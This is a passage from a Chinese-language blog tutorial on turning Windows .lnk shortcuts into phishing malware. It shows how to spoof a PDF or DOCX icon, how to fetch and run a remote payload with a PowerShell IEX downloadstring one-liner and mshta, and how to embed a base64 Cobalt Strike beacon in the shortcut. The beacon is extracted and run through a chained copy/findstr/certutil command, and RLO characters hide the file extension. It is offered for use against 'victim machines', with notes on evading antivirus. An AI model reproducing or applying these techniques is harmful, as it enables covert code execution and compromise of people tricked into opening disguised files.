&gt;------.</span><br><span class="line">| Extra stuff |</span><br><span class="line">+---------------------------+ </span><br></pre></td></tr></table></figure>

<p><img src="/images/1665417001715-4305fe44-bea6-4ea2-95da-b5ba2fe80b08.png"></p>
<p>这里可以拿010Editor对其进行更改</p>
<h5 id="创建快捷方式"><a href="#创建快捷方式" class="headerlink" title="创建快捷方式"></a>创建快捷方式</h5><p>注意，要先更换图标，才能进行后续的操作</p>
<p><img src="/images/1665448852141-39226b39-0239-477a-9946-f1dbb2c9f376.png"></p>
<p>因为更改图标后010打开才会出现icon字段</p>
<p><img src="/images/1665449026463-c440ef39-245d-490b-8e58-4e42455e9df2.png"></p>
<p>更改图标后多出一个ICON_LOCATION字段</p>
<p><img src="/images/1665449054639-c001cccf-734f-41f9-b24d-ee553bac9a9f.png"></p>
<p>从21 00开始</p>
<p><img src="/images/1665401068556-49d67a9a-578d-4596-a01b-66a7f2d0ad33.png"></p>
<p>将 ICON_LOCATION字段设置为 .\xx.pdf，当然 xx可随意设置，不存在的文件也可。</p>
<h5 id="将这一段的16进制值改为"><a href="#将这一段的16进制值改为" class="headerlink" title="将这一段的16进制值改为"></a>将这一段的16进制值改为</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">2E 00 5C 00 78 00 2E 00 70 00 64 00 66 ......后面都是00....10 00</span><br></pre></td></tr></table></figure>

<h5 id="也可以通过模板直接修改"><a href="#也可以通过模板直接修改" class="headerlink" title="也可以通过模板直接修改"></a>也可以通过模板直接修改</h5><p><img src="/images/1665449148607-4fc1a94d-4fc2-4c19-b1c7-3ec8f0013236.png"></p>
<p>将ICON_LOCATION字段更改为.\xx.pdf</p>
<p>这里的xx改成啥都行，不一定是存在的文件名</p>
<p><img src="/images/1665449361659-84c1501a-3175-4f82-ae7b-2c277af2d638.png"></p>
<h5 id="可以看到已经更改"><a href="#可以看到已经更改" class="headerlink" title="可以看到已经更改"></a>可以看到已经更改</h5><p><img src="/images/1665449372237-68597204-7e1d-470f-856a-8fc5a08f79a9.png"></p>
<h5 id="放到其他机器，成功按照默认配置显示"><a href="#放到其他机器，成功按照默认配置显示" class="headerlink" title="放到其他机器，成功按照默认配置显示"></a>放到其他机器，成功按照默认配置显示</h5><p><img src="/images/1665449469739-97141389-28dc-4373-ae25-98d3b281d018.png"></p>
<h5 id="改为docx"><a href="#改为docx" class="headerlink" title="改为docx"></a>改为docx</h5><p><img src="/images/1665449615993-a1978ba5-f4c6-49e5-b18a-a954c6ccb14b.png"></p>
<p><img src="/images/1665449654644-b26a1cdd-ff1d-4735-821d-54c1510947b0.png"></p>
<h5 id="注意-1"><a href="#注意-1" class="headerlink" title="注意"></a>注意</h5><p>更换自己的图标后，更改时和ico_Location字段的前两16进制数无关</p>
<p><img src="/images/1665449969327-f7402ddf-2429-4e63-b3e5-b4cbd722a464.png">‘</p>
<p>使用自定义的ico，ico_Location中的第一个字段变为19</p>
<p><img src="/images/1665450085655-738f35b4-d579-4079-8302-b9bd95e5d8bd.png"></p>
<p>更改ico_Location中的第二个字段为.\xxxx.pdf后仍然有效</p>
<p><img src="/images/1665450145199-70b7fc0d-971b-4570-895c-fad9710d47f4.png"></p>
<h2 id="更改快捷方式后缀"><a href="#更改快捷方式后缀" class="headerlink" title="更改快捷方式后缀"></a>更改快捷方式后缀</h2><p>这个直接改就行</p>
<p><img src="/images/1665451416694-f98ca1eb-6679-4cd2-afb5-586a8c6b1bc6.png"></p>
<p>双击后仍然弹出计算器</p>
<p><img src="/images/1665451441107-aab9bf48-9cdf-405f-af74-2aa42095d97a.png"></p>
<h2 id="执行恶意程序"><a href="#执行恶意程序" class="headerlink" title="执行恶意程序"></a>执行恶意程序</h2><h5 id="执行远程恶意代码"><a href="#执行远程恶意代码" class="headerlink" title="执行远程恶意代码"></a>执行远程恶意代码</h5><p>相对于“执行恶意文件”，该方式仅需一个lnk文件即可完成攻击。</p>
<p>相当于远程执行命令，可通过mshta、powershell、msiexec、bitsadmin等方式加载远程指令</p>
<h5 id="powershell"><a href="#powershell" class="headerlink" title="powershell"></a>powershell</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell.exe -nop -w hidden -c &quot;IEX ((new-object net.webclient).downloadstring(&#x27;http://1.1.1.1:12280/a&#x27;))&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/images/1665455158285-a07780b0-f8a2-436f-92d3-172649413911.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Windows\System32\cmd.exe /c powershell.exe -nop -w hidden -c &quot;IEX ((new-object net.webclient).downloadstring(&#x27;http://1.1.1.1:12280/a&#x27;))&quot;</span><br></pre></td></tr></table></figure>

<h5 id="mshta"><a href="#mshta" class="headerlink" title="mshta"></a>mshta</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Windows\System32\mshta.exe http://xx.xxx/x</span><br></pre></td></tr></table></figure>

<p>当然，以这种形式很很容被检测到，且直接执行这种敏感命令也很难做到免杀。</p>
<h5 id="点击即上线"><a href="#点击即上线" class="headerlink" title="点击即上线"></a>点击即上线</h5><p><img src="/images/1665455262391-83d350e1-622d-43ea-967b-26c533c572b5.png"></p>
<h2 id="执行自身恶意代码"><a href="#执行自身恶意代码" class="headerlink" title="执行自身恶意代码"></a>执行自身恶意代码</h2><p>相对于上面的需要从远程加载恶意代码，此方式会将恶意代码藏在lnk文件本身中</p>
<p>运行时解密释放对应的恶意代码，实现利用</p>
<h5 id="大致逻辑"><a href="#大致逻辑" class="headerlink" title="大致逻辑"></a>大致逻辑</h5><p>将base64编码后的恶意代码追加至 lnk 文件中</p>
<p>用findstr提取对应的恶意编码</p>
<p>certutil -decode对恶意编码进行解码，输出至文件中</p>
<p>本地执行此文件</p>
<p>这里以嵌入执行artifact.exe(CS马)为例</p>
<h5 id="将恶意代码追加写进Lnk文件"><a href="#将恶意代码追加写进Lnk文件" class="headerlink" title="将恶意代码追加写进Lnk文件"></a>将恶意代码追加写进Lnk文件</h5><p>需要注意，在实际的处理中，这一步需要在lnk文件设置完后执行。</p>
<p>否则更改了lnk的目标后，原本追加的内容会被清空</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">printf &#x27;\x0d\x0a&#x27; &gt;&gt; evil3.pdf.lnk     # 回车换行</span><br><span class="line">base64 -w 0 calc.exe &gt;&gt; evil3.pdf.lnk  # base64编码后追加进lnk文件</span><br><span class="line">printf &#x27;\x0d\x0a&#x27; &gt;&gt; evil3.pdf.lnk     # 回车换行</span><br></pre></td></tr></table></figure>

<h5 id="首先先把快捷方式做好"><a href="#首先先把快捷方式做好" class="headerlink" title="首先先把快捷方式做好"></a>首先先把快捷方式做好</h5><p>这里用的是计算机的快捷方式，并把图标修改为pdf</p>
<p><img src="/images/1665456893419-6732528f-be69-4471-bfa8-75d494ee4282.png"></p>
<h5 id="windows没有printf命令可以用git的bash"><a href="#windows没有printf命令可以用git的bash" class="headerlink" title="windows没有printf命令可以用git的bash"></a>windows没有printf命令可以用git的bash</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">printf &#x27;\x0d\x0a&#x27; &gt;&gt; cmd.pdf.lnk     # 回车换行</span><br><span class="line">base64 -w 0 artifact.exe &gt;&gt; cmd.pdf.lnk  # base64编码后追加进lnk文件</span><br><span class="line">printf &#x27;\x0d\x0a&#x27; &gt;&gt; cmd.pdf.lnk     # 回车换行</span><br></pre></td></tr></table></figure>

<p><img src="/images/1665457436660-0e1931a0-156d-4f54-9726-9672922fc98c.png"></p>
<h5 id="从0D-0A一直到最后的0D-0A就是我们追加进的木马"><a href="#从0D-0A一直到最后的0D-0A就是我们追加进的木马" class="headerlink" title="从0D 0A一直到最后的0D 0A就是我们追加进的木马"></a>从0D 0A一直到最后的0D 0A就是我们追加进的木马</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">0d------回车符号－－－－－－&quot;\r&quot;</span><br><span class="line">0a------换行符号－－－－－－&quot;\n&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/images/1665457676104-165a6e44-8cd9-4c32-8fd1-ec68a836831c.png"></p>
<h5 id="findstr提取对应的恶意编码"><a href="#findstr提取对应的恶意编码" class="headerlink" title="findstr提取对应的恶意编码"></a>findstr提取对应的恶意编码</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">findstr /?</span><br><span class="line">在文件中寻找字符串。</span><br></pre></td></tr></table></figure>

<p><img src="/images/1665458045962-5cc05b52-b081-4991-ab42-fb2a8684ad09.png"></p>
<h5 id="base64编码后的前缀是TVqQAAMAAAAEAAA"><a href="#base64编码后的前缀是TVqQAAMAAAAEAAA" class="headerlink" title="base64编码后的前缀是TVqQAAMAAAAEAAA"></a>base64编码后的前缀是TVqQAAMAAAAEAAA</h5><p><img src="/images/1665458144402-e009022e-fd8e-4de6-b92a-7609fd3b0664.png"></p>
<h5 id="提取出恶意编码，输入到临时文件"><a href="#提取出恶意编码，输入到临时文件" class="headerlink" title="提取出恶意编码，输入到临时文件"></a>提取出恶意编码，输入到临时文件</h5><p>使用findstr对其进行查找，提取出恶意编码，输入到临时文件</p>
<p>这里需要注意，findstr直接查找 lnk 文件时，会去查找对应的目标文件</p>
<p>所以需要复制自身为一个普通的二进制文件后再进行查找</p>
<p>cmd有copy命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy cmd.pdf.lnk ./cmdhack</span><br></pre></td></tr></table></figure>

<p><img src="/images/1665458893172-47f4279c-5d0f-4c15-9be5-42f619aedf41.png"></p>
<p>findstr提取</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">findstr &quot;TVqQAAMAAAAEAAA&quot; ./cmdhack &gt; ./hack</span><br></pre></td></tr></table></figure>

<p><img src="/images/1665458966398-42a23069-5d02-425d-9ca6-75e47102cf80.png"></p>
<h5 id="certutil-解码提取源文件"><a href="#certutil-解码提取源文件" class="headerlink" title="certutil 解码提取源文件"></a>certutil 解码提取源文件</h5><p>该命令在cmd中即可运行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">certutil -decode ./hack ./hack.exe</span><br></pre></td></tr></table></figure>

<p><img src="/images/1665459124727-bb6812a6-5658-4148-a4cc-76262d60e76d.png"></p>
<h5 id="最后一步，运行hack-exe"><a href="#最后一步，运行hack-exe" class="headerlink" title="最后一步，运行hack.exe"></a>最后一步，运行hack.exe</h5><p>成功上线</p>
<p><img src="/images/1665459202295-1d77853f-1775-48cf-89c1-bf3c93412425.png"></p>
<h5 id="将上述命令用-amp-串联"><a href="#将上述命令用-amp-串联" class="headerlink" title="将上述命令用&amp;串联"></a>将上述命令用&amp;串联</h5><p>用&amp;&amp;在最后一步执行exe时候会卡住，暂时还不知道为啥</p>
<p>并将输出的文件放入%temp%（每台机子都有且有权限的路径就行）</p>
<p>注意路径斜杠的方向</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Windows\System32\cmd.exe /c copy cmd.pdf.lnk %temp%\cmdhack &amp; findstr &quot;TVqQAAMAAAAEAAA&quot; %temp%\cmdhack &gt; %temp%\hack &amp; certutil -decode %temp%\hack %temp%\cmd.exe &amp; %temp%\cmd.exe</span><br></pre></td></tr></table></figure>

<p>本地执行</p>
<p><img src="/images/1665467986539-d2a3a6a4-b67c-4c40-8c8b-0e2b34036c8f.png"></p>
<p>成功上线</p>
<p><img src="/images/1665467942850-b3dfbf5a-151a-49a2-98f1-c85ffdb9bae1.png"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>所以该方式就是，提前将恶意程序的base64追加到快捷方式</p>
<p>发送给受害机</p>
<p>受害机执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1.用findstr提取对应的恶意编码</span><br><span class="line"></span><br><span class="line">2.certutil -decode对恶意编码进行解码，输出至文件中</span><br><span class="line"></span><br><span class="line">3.本地执行此文件</span><br></pre></td></tr></table></figure>

<p>成功上线</p>
<p>该方式只会在最后一步，本地执行此文件进行查杀，所以将exe的免杀做好就行</p>
<h2 id="注意-2"><a href="#注意-2" class="headerlink" title="注意"></a>注意</h2><p>要先设置目标后再进行恶意负载的追加</p>
<p><img src="/images/1665472045813-2bc1ed2f-1f30-4b91-b6a4-748bb7fc8146.png"></p>
<p>因为目标已修改，追加的内容同时也会被刷新没掉</p>
<p><img src="/images/1665474274726-1565b7a5-f3bc-49ca-b6e7-043b05f3d39d.png"></p>
<h2 id="过长参数处理"><a href="#过长参数处理" class="headerlink" title="过长参数处理"></a>过长参数处理</h2><p>部分主机中，快捷方式指定的参数存在长度限制，当我们想要设置复杂的命令时，会被截断，无法有效运行</p>
<h5 id="这时可直接编辑该文件设置其参数"><a href="#这时可直接编辑该文件设置其参数" class="headerlink" title="这时可直接编辑该文件设置其参数"></a>这时可直接编辑该文件设置其参数</h5><p>下面以010Editor为例</p>
<p>在COMMAND_LINE_ARGUMENTS中，注意此处为宽字节</p>
<p><img src="/images/1665472376694-53070b44-f220-424b-b8ad-f9a3f34be83b.png"></p>
<p>我们这里将长度更改为 300，与其对应的，在 01FBH处添加 (300 - 157) * 2 &#x3D; 286个字节。</p>
<p><img src="/images/1665472900336-5d026455-8c2d-43db-978d-2a612e066b7b.png"></p>
<p><img src="/images/1665473037840-4930e672-fdf9-4e8a-8133-448b5a6c3d5c.png"></p>
<p><img src="/images/1665473487702-0069c60a-9e84-447d-af7d-2a1af56fd50f.png"></p>
<p>然后再填入相关命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/c copy cmd.pdf.lnk %temp%\cmdhack &amp; findstr &quot;TVqQAAMAAAAEAAA&quot; %temp%\cmdhack &gt; %temp%\hack &amp; certutil -decode %temp%\hack %temp%\cmd.exe &amp; %temp%\cmd.exe</span><br></pre></td></tr></table></figure>

<p><img src="/images/1665474657690-79b0425a-0e96-47cb-864b-5b504b7990e6.png"></p>
<p>运行即上线</p>
<p><img src="/images/1665475113282-ffede604-f1b5-48dc-93f4-9b904c30c2d0.png"></p>
<h2 id="隐藏后缀"><a href="#隐藏后缀" class="headerlink" title="隐藏后缀"></a>隐藏后缀</h2><p>上述lnk和真实的pdf相比，还多了一个快捷方式的标志</p>
<p><img src="/images/1665451568354-fc4ef57e-c5f6-46da-ac29-dff3436a976a.png"></p>
<p>而且在单独发送该快捷方式文件时，会显示出Lnk后缀</p>
<p><img src="/images/1665451618704-cfaa2519-a622-4b91-871d-c7021a961989.png"></p>
<p>这时我们可以选择在文件名中插入unicode字符，来实现一个视觉上的隐藏效果</p>
<h5 id="借助RLO字符"><a href="#借助RLO字符" class="headerlink" title="借助RLO字符"></a>借助RLO字符</h5><p>借助RLO字符使部分字符从右向左读</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;RLO&gt;可以使文件名，把&lt;RLO&gt;后面的字符串反向输出</span><br></pre></td></tr></table></figure>

<h5 id="注意，不能直接输入-lt-gt"><a href="#注意，不能直接输入-lt-gt" class="headerlink" title="注意，不能直接输入&lt;&gt;"></a>注意，不能直接输入&lt;&gt;</h5><p><img src="/images/1665476335516-aa884d29-153d-49d7-b917-f6a3a31ca4f6.png"></p>
<h5 id="右键–-gt-插入unicode"><a href="#右键–-gt-插入unicode" class="headerlink" title="右键–&gt;插入unicode"></a>右键–&gt;插入unicode</h5><p>在想要插入的地方右键–&gt;插入unicode–&gt;RLO</p>
<p><img src="/images/1665477214353-8e64941a-4d98-4867-81c1-8d90ee2cefb2.png"></p>
<p><img src="/images/1665477331163-0842d5f8-ec5c-4ea0-ac1d-7f45940b558a.png"></p>
<h5 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h5><p>将快捷方式重命名为M<RLO>fdp.历简</RLO></p>
<p><img src="/images/1665477692051-f245a0b4-655d-4186-915f-397caa397b2e.png"></p>
<p>并不更改文件属性</p>
<p><img src="/images/1665477821386-e204c1de-cc0b-465d-b43a-2579d1bf9766.png"></p>
<p>注意修改完文件名，命令也需要修改</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">M‮fdp.历简.lnk</span><br></pre></td></tr></table></figure>

<p><img src="/images/1665478534564-b79529b0-91eb-44ae-9be5-be4f3f0b114a.png"></p>
<p>注意，复制完直接粘贴过去，因为<RLO>粘贴进去会显示为其他东东</RLO></p>
<p><img src="/images/1665478705153-885c62ce-8894-4e3f-830f-9b9b06f3f68c.png"></p>
<p>运行即上线</p>
<p><img src="/images/1665478279003-94c1ad2c-d640-46c7-b1f3-47e111d364c3.png"></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div>感谢大哥~</div>
  <button>
    赞赏
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.png" alt="fn 微信">
        <span>微信</span>
      </div>

  </div>
</div>


        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/05/17/%E7%A4%BE%E5%B7%A5/badusb%E5%88%9D%E6%8E%A2/" rel="prev" title="badusb初探">
                  <i class="fa fa-chevron-left"></i> badusb初探
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/05/17/%E7%A4%BE%E5%B7%A5/%E9%92%93%E9%B1%BC%E4%B9%8Burl%E9%AD%94%E6%94%B9/" rel="next" title="钓鱼之url魔改">
                  钓鱼之url魔改 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">fn</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>-->

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  





</body>
</html>
